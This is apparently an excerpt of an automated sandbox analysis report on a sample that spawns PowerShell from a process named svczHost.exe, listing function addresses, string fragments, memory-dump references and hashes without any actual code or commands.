Opcode Fuzzy Hash: 8913fa2cecdcf221aa9db8b044929b6acb795ec315f8f53ab60e73710a5f0973
Instruction Fuzzy Hash: 5BC119A391E5DA8BFB1583582D1E5796F92BF52260B2C02F7C4444B1EFAC2C9D09C357

Function 00007FFC7BB58540 Relevance: 17.9, Strings: 14, Instructions: 353COMMON

Download Yara Rule

Strings

x%{, xrefs: 00007FFC7BB585C1
8'{, xrefs: 00007FFC7BB586A1
x&{, xrefs: 00007FFC7BB58641
8%{, xrefs: 00007FFC7BB585A1
I, xrefs: 00007FFC7BB5873D
X%{, xrefs: 00007FFC7BB585B1
x'{, xrefs: 00007FFC7BB586C1
X({, xrefs: 00007FFC7BB58731
x({, xrefs: 00007FFC7BB58741
x${, xrefs: 00007FFC7BB58541
8({, xrefs: 00007FFC7BB58721
X'{, xrefs: 00007FFC7BB586B1
8&{, xrefs: 00007FFC7BB58621
X&{, xrefs: 00007FFC7BB58631

Memory Dump Source

Source File: 00000003.00000002.3762908527.00007FFC7BB50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7BB50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffc7bb50000_powershell.jbxd

Similarity

API ID:
String ID: 8%{$8&{$8'{$8({$I$X%{$X&{$X'{$X({$x${$x%{$x&{$x'{$x({
API String ID: 0-1945280271
Opcode ID: af3a95785932cd7e08895c7d2269b40ee5dd5a4c34aa6497b423621b4e1f546c
Instruction ID: ca7acdbf9f0555b8b76d1233bce8a52ea6f66be2561fc3005fe6858c3264f65b
Opcode Fuzzy Hash: af3a95785932cd7e08895c7d2269b40ee5dd5a4c34aa6497b423621b4e1f546c
Instruction Fuzzy Hash: 56B118A391E5DA8BFB15825C2D1E5796F92BF52260B2C02F7C4444B1EFEC2C9D098357

Function 00007FFC7BB584D4 Relevance: 16.6, Strings: 13, Instructions: 345COMMON

Download Yara Rule

Strings

x%{, xrefs: 00007FFC7BB585C1
8'{, xrefs: 00007FFC7BB586A1
x&{, xrefs: 00007FFC7BB58641
8%{, xrefs: 00007FFC7BB585A1
I, xrefs: 00007FFC7BB5873D
X%{, xrefs: 00007FFC7BB585B1
x'{, xrefs: 00007FFC7BB586C1
X({, xrefs: 00007FFC7BB58731
x({, xrefs: 00007FFC7BB58741
8({, xrefs: 00007FFC7BB58721
X'{, xrefs: 00007FFC7BB586B1
8&{, xrefs: 00007FFC7BB58621
X&{, xrefs: 00007FFC7BB58631

Memory Dump Source

Source File: 00000003.00000002.3762908527.00007FFC7BB50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7BB50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffc7bb50000_powershell.jbxd

Similarity

API ID:
String ID: 8%{$8&{$8'{$8({$I$X%{$X&{$X'{$X({$x%{$x&{$x'{$x({
API String ID: 0-1650264972
Opcode ID: 2e8e04923a6935ac0a04b833e0def1d4a968b9eee82bd6fb128749842f1701de
Instruction ID: 5de184cf1678209c7af136d934033d88591ae9828930d6726745023ab528a58f
Opcode Fuzzy Hash: 2e8e04923a6935ac0a04b833e0def1d4a968b9eee82bd6fb128749842f1701de
Instruction Fuzzy Hash: 26B108A391E5DA8BFB15825C2D1E5796F92BF52260B2C02F7C8444B1EFEC2C9D098357

Function 00007FFC7BB584E4 Relevance: 16.6, Strings: 13, Instructions: 337COMMON

Download Yara Rule

Strings

x%{, xrefs: 00007FFC7BB585C1
8'{, xrefs: 00007FFC7BB586A1
x&{, xrefs: 00007FFC7BB58641
8%{, xrefs: 00007FFC7BB585A1
I, xrefs: 00007FFC7BB5873D
X%{, xrefs: 00007FFC7BB585B1
x'{, xrefs: 00007FFC7BB586C1
X({, xrefs: 00007FFC7BB58731
x({, xrefs: 00007FFC7BB58741
8({, xrefs: 00007FFC7BB58721
X'{, xrefs: 00007FFC7BB586B1
8&{, xrefs: 00007FFC7BB58621
X&{, xrefs: 00007FFC7BB58631

Memory Dump Source

Source File: 00000003.00000002.3762908527.00007FFC7BB50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7BB50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffc7bb50000_powershell.jbxd

Similarity

API ID:
String ID: 8%{$8&{$8'{$8({$I$X%{$X&{$X'{$X({$x%{$x&{$x'{$x({
API String ID: 0-1650264972
Opcode ID: 0c60639a418896b464680d5e34715c5391e40f347dadbec5ef130fd3ec303ad0
Instruction ID: b054feaca3831b1e64ad4e9e1098905327409a82b92bdadd069a73cfc322c136
Opcode Fuzzy Hash: 0c60639a418896b464680d5e34715c5391e40f347dadbec5ef130fd3ec303ad0
Instruction Fuzzy Hash: 37B107A391E5DA8BFB1582582D1E5796F92BF52360B2C02F7C8444B1EFEC2C9D098357

Function 00007FFC7BB584F4 Relevance: 16.6, Strings: 13, Instructions: 329COMMON

Download Yara Rule

Strings

x%{, xrefs: 00007FFC7BB585C1
8'{, xrefs: 00007FFC7BB586A1
x&{, xrefs: 00007FFC7BB58641
8%{, xrefs: 00007FFC7BB585A1
I, xrefs: 00007FFC7BB5873D
X%{, xrefs: 00007FFC7BB585B1
x'{, xrefs: 00007FFC7BB586C1
X({, xrefs: 00007FFC7BB58731
x({, xrefs: 00007FFC7BB58741
8({, xrefs: 00007FFC7BB58721
X'{, xrefs: 00007FFC7BB586B1
8&{, xrefs: 00007FFC7BB58621
X&{, xrefs: 00007FFC7BB58631

Memory Dump Source

Source File: 00000003.00000002.3762908527.00007FFC7BB50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7BB50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffc7bb50000_powershell.jbxd

Similarity

API ID:
String ID: 8%{$8&{$8'{$8({$I$X%{$X&{$X'{$X({$x%{$x&{$x'{$x({
API String ID: 0-1650264972
Opcode ID: ae8e511f4a9bf4e5d1cc2f5ff6bfae8c250de75ca2a88963860034969bc8e56e
Instruction ID: bf05a0538fd945f1b8f36ec3fe2a086aca88ea7d633c87d18ce3218bf307456c
Opcode Fuzzy Hash: ae8e511f4a9bf4e5d1cc2f5ff6bfae8c250de75ca2a88963860034969bc8e56e
Instruction Fuzzy Hash: B9B107A391E5DA8BFB1582582D1E5796F92BF52260B2C02F7C8444B1EFEC2C9D098357

Function 00007FFC7BB58504 Relevance: 16.6, Strings: 13, Instructions: 321COMMON

Download Yara Rule

Strings

x%{, xrefs: 00007FFC7BB585C1
8'{, xrefs: 00007FFC7BB586A1
x&{, xrefs: 00007FFC7BB58641
8%{, xrefs: 00007FFC7BB585A1
I, xrefs: 00007FFC7BB5873D
X%{, xrefs: 00007FFC7BB585B1
x'{, xrefs: 00007FFC7BB586C1
X({, xrefs: 00007FFC7BB58731
x({, xrefs: 00007FFC7BB58741
8({, xrefs: 00007FFC7BB58721
X'{, xrefs: 00007FFC7BB586B1
8&{, xrefs: 00007FFC7BB58621
X&{, xrefs: 00007FFC7BB58631

Memory Dump Source

Source File: 00000003.00000002.3762908527.00007FFC7BB50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7BB50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffc7bb50000_powershell.jbxd

Similarity

API ID:
String ID: 8%{$8&{$8'{$8({$I$X%{$X&{$X'{$X({$x%{$x&{$x'{$x({
API String ID: 0-1650264972
Opcode ID: cd142ad705742019a5e3fe084d8ea66d3e98c1e7d277c6dc10e77d4e85429eac
Instruction ID: e9a5db7766dff617221de5174e3968cc36e72090b245e2d7e3a57dff68ed60b5
Opcode Fuzzy Hash: cd142ad705742019a5e3fe084d8ea66d3e98c1e7d277c6dc10e77d4e85429eac
Instruction Fuzzy Hash: 4BA107A391E5DA8BFB1582582D1E5796F92BF52260B2C02F7C8444B1EFEC2C9D098357

Function 00007FFC7BB58514 Relevance: 16.6, Strings: 13, Instructions: 316COMMON

Download Yara Rule

Strings

x%{, xrefs: 00007FFC7BB585C1
8'{, xrefs: 00007FFC7BB586A1
x&{, xrefs: 00007FFC7BB58641
8%{, xrefs: 00007FFC7BB585A1
I, xrefs: 00007FFC7BB5873D
X%{, xrefs: 00007FFC7BB585B1
x'{, xrefs: 00007FFC7BB586C1
X({, xrefs: 00007FFC7BB58731
x({, xrefs: 00007FFC7BB58741
8({, xrefs: 00007FFC7BB58721
X'{, xrefs: 00007FFC7BB586B1
8&{, xrefs: 00007FFC7BB58621
X&{, xrefs: 00007FFC7BB58631

Memory Dump Source

Source File: 00000003.00000002.3762908527.00007FFC7BB50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7BB50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffc7bb50000_powershell.jbxd

Similarity

API ID:
String ID: 8%{$8&{$8'{$8({$I$X%{$X&{$X'{$X({$x%{$x&{$x'{$x({
API String ID: 0-1650264972
Opcode ID: 687d65d057fb854daaf6c22620556c3fe77faf488366c9ffb52cfbad189c879c
Instruction ID: a51f31741129e7dc74c1e926d1a438f2a5973d82d4f72e050a4c31da3266a6f7
Opcode Fuzzy Hash: 687d65d057fb854daaf6c22620556c3fe77faf488366c9ffb52cfbad189c879c
Instruction Fuzzy Hash: 62A1F7A391E5DA8BFB1582582D1E5796F92BF52260B2C02F7C8444B1EFEC2C9D09C357

Function 00007FFC7BB58524 Relevance: 16.6, Strings: 13, Instructions: 308COMMON

Download Yara Rule

Strings

x%{, xrefs: 00007FFC7BB585C1
8'{, xrefs: 00007FFC7BB586A1
x&{, xrefs: 00007FFC7BB58641
8%{, xrefs: 00007FFC7BB585A1
I, xrefs: 00007FFC7BB5873D
X%{, xrefs: 00007FFC7BB585B1
x'{, xrefs: 00007FFC7BB586C1
X({, xrefs: 00007FFC7BB58731
x({, xrefs: 00007FFC7BB58741
8({, xrefs: 00007FFC7BB58721
X'{, xrefs: 00007FFC7BB586B1
8&{, xrefs: 00007FFC7BB58621
X&{, xrefs: 00007FFC7BB58631

Memory Dump Source

Source File: 00000003.00000002.3762908527.00007FFC7BB50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7BB50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffc7bb50000_powershell.jbxd

Similarity

API ID:
String ID: 8%{$8&{$8'{$8({$I$X%{$X&{$X'{$X({$x%{$x&{$x'{$x({
API String ID: 0-1650264972
Opcode ID: 106cfff7ea2dff9ec918cdb8670cc046c096a4484d15df65720a74d3b30f49bc
Instruction ID: 815bf4669a7c1b94598df0dbbac5720e3fd96b27c119e216d94a1f9ee909af69
Opcode Fuzzy Hash: 106cfff7ea2dff9ec918cdb8670cc046c096a4484d15df65720a74d3b30f49bc
Instruction Fuzzy Hash: 19A1E6A391E5DA8BFB1582582D1E5796F92BF52260B2C02F7C8444B1EFEC2C9D098357

Function 00007FFC7BB58534 Relevance: 15.3, Strings: 12, Instructions: 300COMMON

Download Yara Rule

Strings

x%{, xrefs: 00007FFC7BB585C1
8'{, xrefs: 00007FFC7BB586A1
X({, xrefs: 00007FFC7BB58731
x&{, xrefs: 00007FFC7BB58641
x({, xrefs: 00007FFC7BB58741
I, xrefs: 00007FFC7BB5873D
X%{, xrefs: 00007FFC7BB585B1
x'{, xrefs: 00007FFC7BB586C1
8({, xrefs: 00007FFC7BB58721
X'{, xrefs: 00007FFC7BB586B1
8&{, xrefs: 00007FFC7BB58621
X&{, xrefs: 00007FFC7BB58631

Memory Dump Source

Source File: 00000003.00000002.3762908527.00007FFC7BB50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7BB50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffc7bb50000_powershell.jbxd

Similarity

API ID:
String ID: 8&{$8'{$8({$I$X%{$X&{$X'{$X({$x%{$x&{$x'{$x({
API String ID: 0-829879996
Opcode ID: 03715d8686b9f1e55f2f2aaab8c6834d698374e43274a3d0c7fe2be2b2b88c7c
Instruction ID: bef43b69388e89113285e15ed96a25b781effa3c6ff29d9dec578a426d3b0050
Opcode Fuzzy Hash: 03715d8686b9f1e55f2f2aaab8c6834d698374e43274a3d0c7fe2be2b2b88c7c
Instruction Fuzzy Hash: B1A1E6A391E5DA8BFB1582582D1E5796F92BF52260B2C02F7C8444B1EFEC2C9D098357

Analysis Process: powershell.exePID: 8600, Parent PID: 1804COMMON

Executed Functions

Function 00007FFC7BA4ED40 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3648107119.00007FFC7BA4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7BA4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffc7ba4d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dab937df7bb5ebb8cf3a8a5dfd8af638068a6494b6c18ae10ff5c835fcb63675
Instruction ID: 574fb56c193500d59e71ba6700008275781207f91734d4b64ee55fc4afc4b4c4
Opcode Fuzzy Hash: dab937df7bb5ebb8cf3a8a5dfd8af638068a6494b6c18ae10ff5c835fcb63675
Instruction Fuzzy Hash: 4041373140DBC44FE75ADB2C9841A527FF0EF63320B1901DFD098CB1A7D629A846C7A2

Function 00007FFC7BB63C85 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3648818763.00007FFC7BB60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7BB60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffc7bb60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a40dc67d5e1875b4617f15d47034ebc05cff98480fc504eba1b4e22d3ae12b36
Instruction ID: bf4c188ae4eb1344c188efc8cc65b0dfdd8a8c6b4e38f61cfcdae445101632be
Opcode Fuzzy Hash: a40dc67d5e1875b4617f15d47034ebc05cff98480fc504eba1b4e22d3ae12b36
Instruction Fuzzy Hash: 6B01677111CB0C4FD744EF0CE451AA9B7E0FB99324F50056EE58AC36A5D736E892CB45

Non-executed Functions

Function 00007FFC7BB64CB0 Relevance: 14.0, Strings: 11, Instructions: 259COMMON

Download Yara Rule

Strings

`{, xrefs: 00007FFC7BB64D41
P{, xrefs: 00007FFC7BB64E21
8{, xrefs: 00007FFC7BB64D71
@{, xrefs: 00007FFC7BB64D01
{, xrefs: 00007FFC7BB64E41
h{, xrefs: 00007FFC7BB64CD1
{, xrefs: 00007FFC7BB64CC1
{, xrefs: 00007FFC7BB64DD1
0{, xrefs: 00007FFC7BB64DE1
x{, xrefs: 00007FFC7BB64DF1
X{, xrefs: 00007FFC7BB64DB1

Memory Dump Source

Source File: 00000008.00000002.3648818763.00007FFC7BB60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7BB60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffc7bb60000_powershell.jbxd

Similarity

API ID:
String ID: {$0{$8{$@{$P{$X{$`{$h{$x{${${
API String ID: 0-1122751657
Opcode ID: bdde318226b0c6d1c6d07c006e48bf4ec9b48eef1467d271bcaf41ae1608d93d
Instruction ID: 8ffb9cf6a1640e18692ea5b19d74541459844b8588f29f3c759a13a8e2e5f617
Opcode Fuzzy Hash: bdde318226b0c6d1c6d07c006e48bf4ec9b48eef1467d271bcaf41ae1608d93d
Instruction Fuzzy Hash: AA61F6A3A1EDD28BFA66415C3C170793B52FF926A871C01F7C048472EF9C1A5D0A82DA

Analysis Process: powershell.exePID: 8952, Parent PID: 8892COMMON

Execution Graph

Execution Coverage:	3.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFC7C07299B Relevance: 1.9, Strings: 1, Instructions: 670
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

8o|, xrefs: 00007FFC7C072EE4

Memory Dump Source

Source File: 0000000D.00000002.4699545855.00007FFC7C070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7C070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffc7c070000_powershell.jbxd

Similarity

API ID:
String ID: 8o|
API String ID: 0-3743483153
Opcode ID: 4bc89ffc0880c18bddc94ce6ef0955e8c918cd0d85adc404f8a93caec70d03b9
Instruction ID: efd78d0e445539f18a8991db61ab6937c6a2ecbf516fd79ee6b106dcfbf916fa
Opcode Fuzzy Hash: 4bc89ffc0880c18bddc94ce6ef0955e8c918cd0d85adc404f8a93caec70d03b9
Instruction Fuzzy Hash: 0912792291D7DA8FEB5AD73858555B53FE1EF87320F0801FBD588C70A3DA186856C3A2

Function 00007FFC7BB4E674 Relevance: 1.6, APIs: 1, Instructions: 115
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32 ref: 00007FFC7BB4E71E

Memory Dump Source

Source File: 0000000D.00000002.4598391362.00007FFC7BB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7BB40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffc7bb40000_powershell.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 4f417e5bb92477c6b5fffbfb45714493ae4c1681a31df80b8450c1ee95c2f07a
Instruction ID: 94b6fd6a2f8fb98b8825334b60fea2226ab43c884e524514509a3e89befd2b09
Opcode Fuzzy Hash: 4f417e5bb92477c6b5fffbfb45714493ae4c1681a31df80b8450c1ee95c2f07a
Instruction Fuzzy Hash: 2B31E17190CA5C8FDB59DB98C849AEDBBF0FF65321F04422BD009D3262DB74A805CBA1

Function 00007FFC7BB4E08A Relevance: 1.6, APIs: 1, Instructions: 98
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32 ref: 00007FFC7BB4E71E

Memory Dump Source

Source File: 0000000D.00000002.4598391362.00007FFC7BB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7BB40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffc7bb40000_powershell.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 7105a5a82a9c3e0854d44faf45b05ed2cd311cd6562ec5a72ce8cd3f02f3d58d
Instruction ID: b32df992058bb49f019e1bdc0385728f91b8d2edf4105fecffa17791aaf240d1
Opcode Fuzzy Hash: 7105a5a82a9c3e0854d44faf45b05ed2cd311cd6562ec5a72ce8cd3f02f3d58d
Instruction Fuzzy Hash: CE215E71908A1C9FDB58DF98D449AEDBBE1FB69321F00822BD01AD3651DB70A845CB91

Function 00007FFC7BC1300E Relevance: 1.1, Instructions: 1069
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000D.00000002.4611431797.00007FFC7BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7BC10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffc7bc10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42a1f72156c5bdd2e5a450436319bfee92ac838ec638f8dc3de09add9f8d3019
Instruction ID: ebd4b62396a1d22f2a5e57718a06a150f565ed315820421cd9be2d681427df8d
Opcode Fuzzy Hash: 42a1f72156c5bdd2e5a450436319bfee92ac838ec638f8dc3de09add9f8d3019
Instruction Fuzzy Hash: 6C7266B2A1CA9D8FEB95EB18885467877E1EF59344F1840BDC00CDB2A7DE29EC42C751

Function 00007FFC7C071E51 Relevance: .3, Instructions: 305
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000D.00000002.4699545855.00007FFC7C070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7C070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffc7c070000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50afe460359aaa6c668b92b10527373e34d374c99f5aca7988db121786d04d7d
Instruction ID: 693bdb0007c69d82bc0f59447e6dda4f9d292b825c936d12336231452ccfea6e
Opcode Fuzzy Hash: 50afe460359aaa6c668b92b10527373e34d374c99f5aca7988db121786d04d7d
Instruction Fuzzy Hash: 37914822A1DAAE4FEB99D73858586B57FE1EF56210B0801FBD14CC71E3DE18AC15C3A1

Function 00007FFC7C0720F8 Relevance: .1, Instructions: 144
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000D.00000002.4699545855.00007FFC7C070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7C070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffc7c070000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51d32d1da1bcdd1a8a24cdfceb42aa02967790972d7e342edfe5a7a12122ed20
Instruction ID: a78b615fdd082d3ccbf859953fe4d5e23b651f258b1777c28ce96771d7fcc992
Opcode Fuzzy Hash: 51d32d1da1bcdd1a8a24cdfceb42aa02967790972d7e342edfe5a7a12122ed20
Instruction Fuzzy Hash: 5D41F852A2D6DB8FFB9AC23C18605716FE1EF96110B0840F7D288C71D3DA586C66C3E2

Function 00007FFC7BA2EE20 Relevance: .1, Instructions: 125
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000D.00000002.4582617968.00007FFC7BA2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7BA2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffc7ba2d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70f05418dc9d6e46e2ed5970f18e8da40decf5e4141f386bfa01ce45c44d47eb
Instruction ID: c542868194ca2519a8ec95b15f664820b80b666c6ca893f85b5467c356b84e0a
Opcode Fuzzy Hash: 70f05418dc9d6e46e2ed5970f18e8da40decf5e4141f386bfa01ce45c44d47eb
Instruction Fuzzy Hash: 3641187140DFC85FD756DB3898419523FF0EF67220B1505DFD088CB5A7D625A84AC7A2

Function 00007FFC7BC1B30D Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4611431797.00007FFC7BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7BC10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffc7bc10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87de072bd535579b43748705e1d591a968f8738c5e5eff212e7d42e5370e49f7
Instruction ID: a138e4cda326e1457ee8859c5a4662c70e87f0c43a5980921aef9c6bfe46a1e2
Opcode Fuzzy Hash: 87de072bd535579b43748705e1d591a968f8738c5e5eff212e7d42e5370e49f7
Instruction Fuzzy Hash: 0BF0BE32A0C65D8FEA58EA4CE4414A873E0EF45320B5000BBE01DC70B3DF25EC54CB50

Function 00007FFC7C073FD4 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4699545855.00007FFC7C070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7C070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffc7c070000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b98f21933d5d338b4e435fb8756d04e7cd807904a012f0d8ae6fa974e1e77939
Instruction ID: e4ed5b7cd73f941e430073ed44ed467a6b5a5963e0b85030874853ed85bd88bd
Opcode Fuzzy Hash: b98f21933d5d338b4e435fb8756d04e7cd807904a012f0d8ae6fa974e1e77939
Instruction Fuzzy Hash: 7AF0A73131CF044FD744EE1CD849665B3D0FBA8310F10462FE44AC3251DA21E4818782

Function 00007FFC7BC1B5C0 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4611431797.00007FFC7BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7BC10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffc7bc10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64fd98db0fbb47d2023da1a834273d0003e8c928e6c05142981a31e7f07aea2b
Instruction ID: 9e76e819efe09da1bf70c687506a94200444b084090b6a4c3dc0bd8ebd05f47b
Opcode Fuzzy Hash: 64fd98db0fbb47d2023da1a834273d0003e8c928e6c05142981a31e7f07aea2b
Instruction Fuzzy Hash: 88F03A72A1C56D8FEA59EB48E4414A877E0FF45361B5400FAE11DCB467DA25EC44CB60

Analysis Process: svczHost.exePID: 6444, Parent PID: 1352COMMON

Non-executed Functions

Function 00007FF7993BBFE0 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF7993BC00C
GetCurrentThreadId.KERNEL32 ref: 00007FF7993BC01A
GetCurrentProcessId.KERNEL32 ref: 00007FF7993BC026
QueryPerformanceCounter.KERNEL32 ref: 00007FF7993BC036

Memory Dump Source

Source File: 00000014.00000002.4764463489.00007FF799301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF799300000, based on PE: true

Associated: 00000014.00000002.4764401645.00007FF799300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.4765472868.00007FF799780000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.4765894682.00007FF7998F2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.4765894682.00007FF799A08000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.4765894682.00007FF799A0B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.4766902300.00007FF799C17000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.4767004625.00007FF799C18000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.4767004625.00007FF799C31000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.4767004625.00007FF799C34000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.4767004625.00007FF799C36000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.4767447722.00007FF799C39000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff799300000_svczHost.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 8dc9797bf68c6e5250aa19576460b601b27d2e6d7739833455c1b921422f380a
Instruction ID: 6a9c98187682f7870c8862bcffdc1b32169e68fd6619a9916309600c8d21ea50
Opcode Fuzzy Hash: 8dc9797bf68c6e5250aa19576460b601b27d2e6d7739833455c1b921422f380a
Instruction Fuzzy Hash: 1A114C26B14F018AFB20DF70E8552B873B4FB19768F841A35DA2D467A4EF78D1A48390

Analysis Process: powershell.exePID: 9136, Parent PID: 6444COMMON

Executed Functions

Function 00007FFC7BB777A6 Relevance: .5, Instructions: 472COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.4208836763.00007FFC7BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7BB70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffc7bb70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63e6240f855d04219ad2ea7fc31f04a369940c25b63398cada19a9c49a47625a
Instruction ID: cf785fe58d8e4ec3d0dfd92b3e28f97ba1d7306fe2aaa99c630a652aeb24e806
Opcode Fuzzy Hash: 63e6240f855d04219ad2ea7fc31f04a369940c25b63398cada19a9c49a47625a
Instruction Fuzzy Hash: AEF1B331918A8E8FEBA8DF28C8557E937E1FF54310F04426BE84DC72A5CB34A945CB91

Function 00007FFC7BB78552 Relevance: .5, Instructions: 459COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.4208836763.00007FFC7BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7BB70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffc7bb70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1613eed56e97e626396a44b21e9724a60b8a4849a6cb5e7f6b5bf0c2bbaf8690
Instruction ID: a72e48f141e18391666fa777b84c3de9c307c966d2290224fcb8d38c0c632c76
Opcode Fuzzy Hash: 1613eed56e97e626396a44b21e9724a60b8a4849a6cb5e7f6b5bf0c2bbaf8690
Instruction Fuzzy Hash: 71E1B331918A8E8FEBA8DF28C8597E977D1FF54310F04426ED84DC72A5CB78A845CB91

Function 00007FFC7BB78166 Relevance: .3, Instructions: 334COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.4208836763.00007FFC7BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC7BB70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffc7bb70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 320e4b3275d4c506449c304959198eb7e8a3591cf05217b630cfbd8ce39e1c0a
Instruction ID: 28e1da963f6e4748e4c45c48d8dbba033b421a011cf440fe451195744752113c
Opcode Fuzzy Hash: 320e4b3275d4c506449c304959198eb7e8a3591cf05217b630cfbd8ce39e1c0a
